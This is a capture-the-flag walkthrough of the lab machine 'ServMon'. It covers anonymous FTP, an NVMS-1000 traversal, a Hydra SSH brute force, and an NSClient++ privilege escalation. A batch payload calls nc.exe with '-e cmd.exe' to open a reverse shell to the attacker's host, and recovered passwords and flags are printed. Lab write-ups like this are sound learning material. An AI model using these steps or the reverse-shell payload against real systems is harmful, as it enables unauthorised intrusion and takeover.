TL;DR
- Connect as Anonymous to FTP server and find notes about the location of the passwords file
- Use LFI on NVMS to read the passwords file
- Bruteforce passwords file to get SSH access
- Reuse password to connect to Nsclient++ Web UI
- Create Nsclient++ schedule task to execute reverse shell as Administrator
User.txt
Reconnaissance
Let’s start by a Nmap scan:
magnussen@funcMyLife:~/servmon$ nmap -sS -sV -sC -p- -vvv --min-rate 5000 --reason -oN servmon.txt 10.10.10.184
# Nmap 7.60 scan initiated Sat Apr 18 18:36:13 2020 as: nmap -sS -sV -sC -p- -vvv --min-rate 5000 --reason -oN servmon.txt 10.10.10.184
Increasing send delay for 10.10.10.184 from 0 to 5 due to 136 out of 453 dropped probes since last increase.
Warning: 10.10.10.184 giving up on port because retransmission cap hit (10).
Increasing send delay for 10.10.10.184 from 640 to 1000 due to 185 out of 616 dropped probes since last increase.
Nmap scan report for servmon.htb (10.10.10.184)
Host is up, received echo-reply ttl 127 (0.078s latency).
Scanned at 2020-04-18 18:36:13 CEST for 306s
Not shown: 54168 closed ports, 11351 filtered ports
Reason: 54168 resets and 11351 no-responses
PORT STATE SERVICE REASON VERSION
21/tcp open ftp syn-ack ttl 127 Microsoft ftpd
| ftp-anon: Anonymous FTP login allowed (FTP code 230)
|_01-18-20 12:05PM <DIR> Users
| ftp-syst:
|_ SYST: Windows_NT
22/tcp open ssh syn-ack ttl 127 OpenSSH for_Windows_7.7 (protocol 2.0)
| ssh-hostkey:
| 2048 b9:89:04:ae:b6:26:07:3f:61:89:75:cf:10:29:28:83 (RSA)
| ssh-rsa AAAAB3NzaC1yc2EAAAADAQABAAABAQDnC92+BCplDo38VDQIZzb7V3HN/OucvxF0VMDDoYShdUrpDUW6JcSR/Zr6cADbHy7eDLw2O+WW+M4SzH7kfpbTv3HvJ0z8iOsRs2nUrUint4CR/A2vYA9SFOk18FU0QUS0sByBIlemU0uiPxN+iRCcpFhZDj+eiVRF7o/XxNbExnhU/2n9MXwFS8XTYNeGqSLE1vV6KdpMfpJj/yey8gvEpDQTX5OQK+kkUHze3LXLyu/XVTKzfqUBMAP+IQ5F6ICWgaC1a+cx/D7C/aobCbqaXY+75t1mxbEMmm1Wv/42nVQxcT7tN2C3sds4VJkYgZKcBhsE0XdJcR9mTb1wWsg9
| 256 71:4e:6c:c0:d3:6e:57:4f:06:b8:95:3d:c7:75:57:53 (ECDSA)
| ecdsa-sha2-nistp256 AAAAE2VjZHNhLXNoYTItbmlzdHAyNTYAAAAIbmlzdHAyNTYAAABBBMToH2eB7rzpMZuvElpHYko/TXSsOfG8EXWQxmC/T4PCaAmVRDgJWEFMHgpRilSAKoOBlS2RHWNpMJldTFbWSVo=
| 256 15:38:bd:75:06:71:67:7a:01:17:9c:5c:ed:4c:de:0e (EdDSA)
|_ssh-ed25519 AAAAC3NzaC1lZDI1NTE5AAAAILbqSRVLRJFVNhD0W0C5xB7b3RoJZZKdM+jSGryFWOQa
80/tcp open tcpwrapped syn-ack ttl 127
|_http-favicon: Unknown favicon MD5: 3AEF8B29C4866F96A539730FAB53A88F
| http-methods:
|_ Supported Methods: POST OPTIONS
|_http-title: Site doesn't have a title (text/html).
135/tcp open msrpc syn-ack ttl 127 Microsoft Windows RPC
139/tcp open netbios-ssn syn-ack ttl 127 Microsoft Windows netbios-ssn
445/tcp open microsoft-ds? syn-ack ttl 127
5040/tcp open unknown syn-ack ttl 127
5666/tcp open tcpwrapped syn-ack ttl 127
6063/tcp open x11? syn-ack ttl 127
6699/tcp open napster? syn-ack ttl 127
7680/tcp open pando-pub? syn-ack ttl 127
8443/tcp open ssl/https-alt syn-ack ttl 127
| fingerprint-strings:
| FourOhFourRequest, HTTPOptions, RTSPRequest, SIPOptions:
| HTTP/1.1 404
| Content-Length: 18
|_ Document not found
| ssl-cert: Subject: commonName=localhost
| Issuer: commonName=localhost
| Public Key type: rsa
| Public Key bits: 2048
| Signature Algorithm: sha1WithRSAEncryption
| Not valid before: 2020-01-14T13:24:20
| Not valid after: 2021-01-13T13:24:20
| MD5: 1d03 0c40 5b7a 0f6d d8c8 78e3 cba7 38b4
| SHA-1: 7083 bd82 b4b0 f9c0 cc9c 5019 2f9f 9291 4694 8334
| -----BEGIN CERTIFICATE-----
| MIICoTCCAYmgAwIBAgIBADANBgkqhkiG9w0BAQUFADAUMRIwEAYDVQQDDAlsb2Nh
| bGhvc3QwHhcNMjAwMTE0MTMyNDIwWhcNMjEwMTEzMTMyNDIwWjAUMRIwEAYDVQQD
| DAlsb2NhbGhvc3QwggEiMA0GCSqGSIb3DQEBAQUAA4IBDwAwggEKAoIBAQDXCoMi
| kUUWbCi0E1C/LfZFrm4UKCheesOFUAITOnrCvfkYmUR0o7v9wQ8yR5sQR8OIxfJN
| vOTE3C/YZjPE/XLFrLhBpb64X83rqzFRwX7bHVr+PZmHQR0qFRvrsWoQTKcjrElo
| R4WgF4AWkR8vQqsCADPuDGIsNb6PyXSru8/A/HJSt5ef8a3dcOCszlm2bP62qsa8
| XqumPHAKKwiu8k8N94qyXyVwOxbh1nPcATwede5z/KkpKBtpNfSFjrL+sLceQC5S
| wU8u06kPwgzrqTM4L8hyLbsgGcByOBeWLjPJOuR0L/a33yTL3lLFDx/RwGIln5s7
| BwX8AJUEl+6lRs1JAgMBAAEwDQYJKoZIhvcNAQEFBQADggEBAAjXGVBKBNUUVJ51
| b2f08SxINbWy4iDxomygRhT/auRNIypAT2muZ2//KBtUiUxaHZguCwUUzB/1jiED
| s/IDA6dWvImHWnOZGgIUsLo/242RsNgKUYYz8sxGeDKceh6F9RvyG3Sr0OyUrPHt
| sc2hPkgZ0jgf4igc6/3KLCffK5o85bLOQ4hCmJqI74aNenTMNnojk42NfBln2cvU
| vK13uXz0wU1PDgfyGrq8DL8A89zsmdW6QzBElnNKpqNdSj+5trHe7nYYM5m0rrAb
| H2nO4PdFbPGJpwRlH0BOm0kIY0az67VfOakdo1HiWXq5ZbhkRm27B2zO7/ZKfVIz
| XXrt6LA=
|_-----END CERTIFICATE-----
|_ssl-date: TLS randomness does not represent time
49665/tcp open msrpc syn-ack ttl 127 Microsoft Windows RPC
49666/tcp open msrpc syn-ack ttl 127 Microsoft Windows RPC
49668/tcp open msrpc syn-ack ttl 127 Microsoft Windows RPC
49670/tcp open msrpc syn-ack ttl 127 Microsoft Windows RPC
1 service unrecognized despite returning data. If you know the service/version, please submit the following fingerprint at https://nmap.org/cgi-bin/submit.cgi?new-service :
SF-Port8443-TCP:V=7.60%T=SSL%I=7%D=4/18%Time=5E9B2D07%P=x86_64-pc-linux-gn
SF:u%r(HTTPOptions,36,"HTTP/1\.1\x20404\r\nContent-Length:\x2018\r\n\r\nDo
SF:cument\x20not\x20found")%r(FourOhFourRequest,36,"HTTP/1\.1\x20404\r\nCo
SF:ntent-Length:\x2018\r\n\r\nDocument\x20not\x20found")%r(RTSPRequest,36,
SF:"HTTP/1\.1\x20404\r\nContent-Length:\x2018\r\n\r\nDocument\x20not\x20fo
SF:und")%r(SIPOptions,36,"HTTP/1\.1\x20404\r\nContent-Length:\x2018\r\n\r\
SF:nDocument\x20not\x20found");
Service Info: OS: Windows; CPE: cpe:/o:microsoft:windows
Host script results:
| p2p-conficker:
| Checking for Conficker.C or higher...
| Check 1 (port 40676/tcp): CLEAN (Couldn't connect)
| Check 2 (port 20065/tcp): CLEAN (Couldn't connect)
| Check 3 (port 54993/udp): CLEAN (Failed to receive data)
| Check 4 (port 62863/udp): CLEAN (Timeout)
|_ 0/4 checks are positive: Host is CLEAN or ports are blocked
| smb2-security-mode:
| 2.02:
|_ Message signing enabled but not required
| smb2-time:
| date: 2020-04-18 18:43:52
|_ start_date: 1601-01-01 00:09:21
Read data files from: /usr/bin/../share/nmap
Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
# Nmap done at Sat Apr 18 18:41:19 2020 -- 1 IP address (1 host up) scanned in 306.51 seconds
So we find 4 useful services:
- FTP (21)
- SSH (22)
- IIS (80)
- NSClient++ (8443)
The website is NVMS login page.
Ftp anonymous
Let’s try to connect to the FTP service with the anonymous account.
magnussen@funcMyLife:~/servmon$ ftp
ftp> open 10.10.10.184
Connected to 10.10.10.184.
220 Microsoft FTP Service
Name (10.10.10.184:magnussen): anonymous
331 Anonymous access allowed, send identity (e-mail name) as password.
Password:
230 User logged in.
Remote system type is Windows_NT.
ftp> dir
01-18-20 12:05PM <DIR> Users
ftp> dir Users
01-18-20 12:06PM <DIR> Nadine
01-18-20 12:08PM <DIR> Nathan
ftp> dir Users/Nadine
01-18-20 12:08PM 174 Confidential.txt
ftp> get Users/Nadine/Confidential.txt
226 Transfer complete.
174 bytes received in 0.06 secs (2.8721 kB/s)
ftp> dir Users/Nathan
01-18-20 12:10PM 186 Notes to do.txt
ftp> get Users/Nathan/Notes\ to\ do.txt
226 Transfer complete.
186 bytes received in 0.06 secs (2.9735 kB/s)
So there’s two directories: Nadine and Nathan, probably two system user. We also retrieve two text files, let’s read them.
magnussen@funcMyLife:~/servmon$ cat Confidential.txt
Nathan,
I left your Passwords.txt file on your Desktop. Please remove this once you have edited it yourself and place it back into the secure folder.
Regards
Nadine
magnussen@funcMyLife:~/servmon$ cat Notes\ to\ do.txt
1) Change the password for NVMS - Complete
2) Lock down the NSClient Access - Complete
3) Upload the passwords
4) Remove public access to NVMS
5) Place the secret files in SharePoint
Ok, it seems there’s a passwords file on Nathan’s desktop.
NVMS-1000 LFI
When we search for CVE on NVMS-1000 we find the following exploit TVT NVMS 1000 - Directory Traversal
Let’s check that out:
This NVMS-1000 version is vulnerable to LFI, let’s try to retrieve the passwords file mentioned earlier.
Nice, we retrieve a password list.
SSH brute force
So we have a password list and some usernames, let’s brute force the SSH service to see if we can connect to it with an account.
As SSH username is case sensitive I’ve created a file with the two username with the first letter upper and lower
magnussen@funcMyLife:~/servmon$ cat user.txt
Nadine
nadine
Nathan
nathan
magnussen@funcMyLife:~/servmon$
1nsp3ctTh3Way2Mars!
Th3r34r3To0M4nyTrait0r5!
B3WithM30r4ga1n5tMe
L1k3B1gBut7s@W0rk
0nly7h3y0unGWi11F0l10w
IfH3s4b0Utg0t0H1sH0me
Gr4etN3w5w17hMySk1Pa5$
magnussen@funcMyLife:~/servmon$ hydra -L user.txt -P Passwords.txt -s 22 -f servmon.htb ssh
Hydra v8.6 (c) 2017 by van Hauser/THC - Please do not use in military or secret service organizations, or for illegal purposes.
Hydra (http://www.thc.org/thc-hydra) starting at 2020-04-19 01:41:04
[WARNING] Many SSH configurations limit the number of parallel tasks, it is recommended to reduce the tasks: use -t 4
[DATA] max 16 tasks per 1 server, overall 16 tasks, 28 login tries (l:4/p:7), ~2 tries per task
[DATA] attacking ssh://servmon.htb:22/
[22][ssh] host: servmon.htb login: Nadine password: L1k3B1gBut7s@W0rk
[STATUS] attack finished for servmon.htb (valid pair found)
1 of 1 target successfully completed, 1 valid password found
Hydra (http://www.thc.org/thc-hydra) finished at 2020-04-19 01:41:10
Nice, we can log in as Nadine with L1k3B1gBut7s@W0rk.
magnussen@funcMyLife:~/servmon$ ssh Nadine@servmon.htb
Nadine@servmon.htb's password:
Microsoft Windows [Version 10.0.18363.752]
(c) 2019 Microsoft Corporation. All rights reserved.
nadine@SERVMON C:\Users\Nadine>dir
Volume in drive C has no label.
Volume Serial Number is 728C-D22C
Directory of C:\Users\Nadine
19/04/2020 00:42 <DIR> .
19/04/2020 00:42 <DIR> ..
19/04/2020 00:23 <DIR> .ssh
18/01/2020 11:23 <DIR> 3D Objects
18/01/2020 11:23 <DIR> Contacts
08/04/2020 22:28 <DIR> Desktop
08/04/2020 22:28 <DIR> Documents
18/01/2020 11:23 <DIR> Downloads
08/04/2020 22:27 <DIR> Favorites
08/04/2020 22:27 <DIR> Links
18/01/2020 11:23 <DIR> Music
18/01/2020 11:31 <DIR> OneDrive
18/01/2020 11:23 <DIR> Pictures
18/01/2020 11:23 <DIR> Saved Games
18/01/2020 11:23 <DIR> Searches
18/01/2020 11:23 <DIR> Videos
0 File(s) 0 bytes
16 Dir(s) 27,439,128,576 bytes free
nadine@SERVMON C:\Users\Nadine>cd Desktop
nadine@SERVMON C:\Users\Nadine\Desktop>dir
Volume in drive C has no label.
Volume Serial Number is 728C-D22C
Directory of C:\Users\Nadine\Desktop
08/04/2020 22:28 <DIR> .
08/04/2020 22:28 <DIR> ..
19/04/2020 00:16 34 user.txt
1 File(s) 34 bytes
2 Dir(s) 27,438,882,816 bytes free
nadine@SERVMON C:\Users\Nadine\Desktop>type user.txt
3f12d64256b352f6d6aa65bd0e64e78c
Great, we have the user.txt flag. Just have to privesc now!
I AM ROOT
Nsclient++ privilege escalation
Previously we found Nsclient++ WEB UI:
Nsclient++ is a monitoring agent used for nagios
If we check for CVE on NSClient we find NSClient++ 0.5.2.35 - Privilege Escalation.
Let’s retrieve the password of the WEB UI to exploit this CVE.
nadine@SERVMON C:\Users\Nadine\Desktop>cd "C:\Program Files"
nadine@SERVMON C:\Program Files>dir
Volume in drive C has no label.
Volume Serial Number is 728C-D22C
Directory of C:\Program Files
08/04/2020 23:21 <DIR> .
08/04/2020 23:21 <DIR> ..
08/04/2020 23:21 <DIR> Common Files
08/04/2020 23:18 <DIR> Internet Explorer
19/03/2019 05:52 <DIR> ModifiableWindowsApps
16/01/2020 19:11 <DIR> NSClient++
08/04/2020 23:09 <DIR> Reference Assemblies
08/04/2020 23:21 <DIR> UNP
14/01/2020 09:14 <DIR> VMware
08/04/2020 22:31 <DIR> Windows Defender
08/04/2020 22:45 <DIR> Windows Defender Advanced Threat Protection
19/03/2019 05:52 <DIR> Windows Mail
19/03/2019 12:43 <DIR> Windows Multimedia Platform
19/03/2019 06:02 <DIR> Windows NT
19/03/2019 12:43 <DIR> Windows Photo Viewer
19/03/2019 12:43 <DIR> Windows Portable Devices
19/03/2019 05:52 <DIR> Windows Security
19/03/2019 05:52 <DIR> WindowsPowerShell
0 File(s) 0 bytes
18 Dir(s) 27,434,434,560 bytes free
nadine@SERVMON C:\Program Files>cd "NSClient++"
nadine@SERVMON C:\Program Files\NSClient++>dir
Volume in drive C has no label.
Volume Serial Number is 728C-D22C
Directory of C:\Program Files\NSClient++
16/01/2020 19:11 <DIR> .
16/01/2020 19:11 <DIR> ..
09/12/2015 01:17 28,672 boost_chrono-vc110-mt-1_58.dll
09/12/2015 01:17 50,688 boost_date_time-vc110-mt-1_58.dll
09/12/2015 01:17 117,760 boost_filesystem-vc110-mt-1_58.dll
09/12/2015 01:22 439,296 boost_program_options-vc110-mt-1_58.dll
09/12/2015 01:23 256,000 boost_python-vc110-mt-1_58.dll
09/12/2015 01:17 765,952 boost_regex-vc110-mt-1_58.dll
09/12/2015 01:16 19,456 boost_system-vc110-mt-1_58.dll
09/12/2015 01:18 102,400 boost_thread-vc110-mt-1_58.dll
14/01/2020 14:24 51 boot.ini
18/01/2018 16:51 157,453 changelog.txt
28/01/2018 23:33 1,210,392 check_nrpe.exe
19/04/2020 00:50 <DIR> crash-dumps
05/11/2017 22:09 318,464 Google.ProtocolBuffers.dll
09/12/2015 00:16 1,655,808 libeay32.dll
05/11/2017 23:04 18,351 license.txt
05/10/2017 08:19 203,264 lua.dll
14/01/2020 14:24 <DIR> modules
19/04/2020 00:47 3,792 nsclient.ini
19/04/2020 00:49 48,207 nsclient.log
05/11/2017 22:42 55,808 NSCP.Core.dll
28/01/2018 23:32 4,765,208 nscp.exe
05/11/2017 22:42 483,328 NSCP.Protobuf.dll
19/11/2017 17:18 534,016 nscp_json_pb.dll
19/11/2017 16:55 2,090,496 nscp_lua_pb.dll
23/01/2018 21:57 507,904 nscp_mongoose.dll
19/11/2017 16:49 2,658,304 nscp_protobuf.dll
05/11/2017 23:04 3,921 old-settings.map
28/01/2018 23:21 1,973,760 plugin_api.dll
23/05/2015 09:44 3,017,216 python27.dll
27/09/2015 16:42 28,923,515 python27.zip
28/01/2018 23:34 384,536 reporter.exe
19/04/2020 00:24 <DIR> scripts
14/01/2020 14:24 <DIR> security
09/12/2015 00:16 348,160 ssleay32.dll
23/05/2015 09:44 689,664 unicodedata.pyd
14/01/2020 14:24 <DIR> web
05/11/2017 22:20 1,273,856 where_filter.dll
23/05/2015 09:44 47,616 _socket.pyd
33 File(s) 53,153,314 bytes
7 Dir(s) 27,433,824,256 bytes free
nadine@SERVMON C:\Program Files\NSClient++>typensclient.ini
'typensclient.ini' is not recognized as an internal or external command,
operable program or batch file.
nadine@SERVMON C:\Program Files\NSClient++>type nsclient.ini
ยด# If you want to fill this file with all available options run the following command:
# nscp settings --generate --add-defaults --load-all
# If you want to activate a module and bring in all its options use:
# nscp settings --activate-module <MODULE NAME> --add-defaults
# For details run: nscp settings --help
; in flight - TODO
[/settings/default]
; Undocumented key
password = ew2x6SsGTxjRwXOT
; Undocumented key
allowed hosts = 127.0.0.1
; in flight - TODO
[/settings/NRPE/server]
; Undocumented key
ssl options = no-sslv2,no-sslv3
; Undocumented key
verify mode = peer-cert
; Undocumented key
insecure = false
; in flight - TODO
[/modules]
; Undocumented key
CheckHelpers = disabled
; Undocumented key
CheckEventLog = disabled
; Undocumented key
CheckNSCP = disabled
; Undocumented key
CheckDisk = disabled
; Undocumented key
CheckSystem = disabled
; Undocumented key
WEBServer = enabled
; Undocumented key
NRPEServer = enabled
; CheckTaskSched - Check status of your scheduled jobs.
CheckTaskSched = enabled
; Scheduler - Use this to schedule check commands and jobs in conjunction with for instance passive monitoring through NSCA
Scheduler = enabled
; CheckExternalScripts - Module used to execute external scripts
CheckExternalScripts = enabled
; Script wrappings - A list of templates for defining script commands. Enter any command line here and they will be expanded by scripts placed under the wrapped scripts section. %SCRIPT% will be replaced by the actual script an %ARGS% will be replaced by any given arguments.
[/settings/external scripts/wrappings]
; Batch file - Command used for executing wrapped batch files
bat = scripts\\%SCRIPT% %ARGS%
; Visual basic script - Command line used for wrapped vbs scripts
vbs = cscript.exe //T:30 //NoLogo scripts\\lib\\wrapper.vbs %SCRIPT% %ARGS%
; POWERSHELL WRAPPING - Command line used for executing wrapped ps1 (powershell) scripts
ps1 = cmd /c echo If (-Not (Test-Path "scripts\%SCRIPT%") ) { Write-Host "UNKNOWN: Script
`"%SCRIPT%`" not found."; exit(3) }; scripts\%SCRIPT% $ARGS$; exit($lastexitcode) | powers
hell.exe /noprofile -command -
; External scripts - A list of scripts available to run from the CheckExternalScripts modu
le. Syntax is: `command=script arguments`
[/settings/external scripts/scripts]
; Undocumented key
gen = scripts\gen.bat
; Schedules - Section for the Scheduler module.
[/settings/scheduler/schedules]
; Undocumented key
foobar = command = foobar
; External script settings - General settings for the external scripts module (CheckExternalScripts).
[/settings/external scripts]
allow arguments = true
; SCHEDULE DEFENITION - Schedule definition for: default
[/settings/scheduler/schedules/default]
; SCHEDULE INTERAVAL - Time in seconds between each check
interval = 60
; Web server - Section for WEB (WEBServer.dll) (check_WEB) protocol options.
[/settings/WEB/server]
; ALLOWED HOSTS - A comma separated list of allowed hosts. You can use netmasks (/ syntax) or * to create ranges. parent for this key is found under: /settings/default this is mark ed as advanced in favor of the parent.
allowed hosts = 127.0.0.1,10.10.15.43/23,10.10.14.8/23
; script: default - The configuration section for the default script.
[/settings/external scripts/scripts/default]
We found the password to connect to the WEB UI (ew2x6SsGTxjRwXOT) and we find another interesting information, the only host allowed to connect to the admin menu is localhost.
Not a problem, let’s do some port forwarding before acceding to the WEB UI.
magnussen@funcMyLife:~/servmon$ ssh -L 8443:127.0.0.1:8443 Nadine@servmon.htb
Nadine@servmon.htb's password:
Microsoft Windows [Version 10.0.18363.752]
(c) 2019 Microsoft Corporation. All rights reserved.
First of all we have to upload our payload and netcat executable to execute it on the victim.
magnussen@funcMyLife:~/servmon$ cat magnussen.bat
@echo off
c:\temp\nc.exe 10.10.15.111 7777 -e cmd.exe
magnussen@funcMyLife:~/servmon$ scp magnussen.bat Nadine@servmon.htb:c:/temp/
Nadine@servmon.htb's password:
magnussen.bat 100% 54 0.8KB/s 00:00
magnussen@funcMyLife:~/servmon$ scp nc.exe Nadine@servmon.htb:c:/temp/
nc.exe 100% 54 0.8KB/s 00:00
We have to create a custom script through the WEB UI in order to execute our payload with a schedule task.
Then we have to create a schedule task to execute our custom script.
Finally, we restart the service in order to apply the new configuration and wait for the connection.
magnussen@funcMyLife:~/servmon$ nc -lvp 7777
Listening on [0.0.0.0] (family 0, port 7777)
Connection from servmon.htb 56452 received!
C:\Program Files\NSClient++> dir C:\Users\Administrator\Desktop
dir C:\Users\Administrator\Desktop
Volume in drive C has no label.
Volume Serial Number is 728C-D22C
Directory of C:\Users\Administrator\Desktop
08/04/2020 23:12 <DIR> .
08/04/2020 23:12 <DIR> ..
23/04/2020 08:58 34 root.txt
1 File(s) 34 bytes
2 Dir(s) 27,433,795,584 bytes free
C:\Program Files\NSClient++> type C:\Users\Administrator\Desktop\root.txt
type C:\Users\Administrator\Desktop\root.txt
887fe3797897795b474ceba6a399f7bd
I AM ROOT!
This was a fun box, pretty easy, but I’ve learned a few things, thanks dmw0ng!